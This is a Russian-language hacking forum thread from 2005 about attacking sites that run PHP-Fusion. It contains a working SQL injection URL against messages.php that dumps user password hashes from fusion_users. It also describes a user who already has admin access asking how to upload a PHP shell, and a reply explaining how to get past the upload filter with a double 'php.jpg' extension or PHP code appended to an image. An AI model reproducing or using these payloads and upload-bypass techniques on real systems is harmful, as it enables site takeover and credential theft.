Ну вообщем работает тема. Стал админом, а дальше, как php файл на сервер загрузить, через админ панель и функцию аплоада вайлов не получается, пишет, что формат не тот, загружает эта функция в папку downloads, а в ней содержатся, архивы, максимум изображения. Так как пхп туда запхнуть???
Заранее спасибо!!!
что значит "работает тема"?
Почему ты назвал тему "Sql инъекция в движке php_fusion".. и нигде про эту инъекцию не упоминаешь?! Гм.. а вопрос вообще спрашиваешь как туда залить шелл..
messages.php?folder=inbox&show=H'%20union%20select%201,1,1,user_password,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1+from+fusion_users/*
Иньекция после "messages.php?folder=inbox&show=" - имеет место быть! Вообщем да, вопрос не в этом, а втом, как туда залить PHP файлик? :)
ghostwizard
06.12.2005, 21:07
попробуй file.php.jpg, потом обратись usl/file.php.... но не факт что сработает из-за ограничения на исполнение в папке, так или иначе попробуй... если руганется на недопустимый тип файлов, то в руки hex-editor, добавляешь в конец *.jpg(gif,... etc) свой код и сохраняешь.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot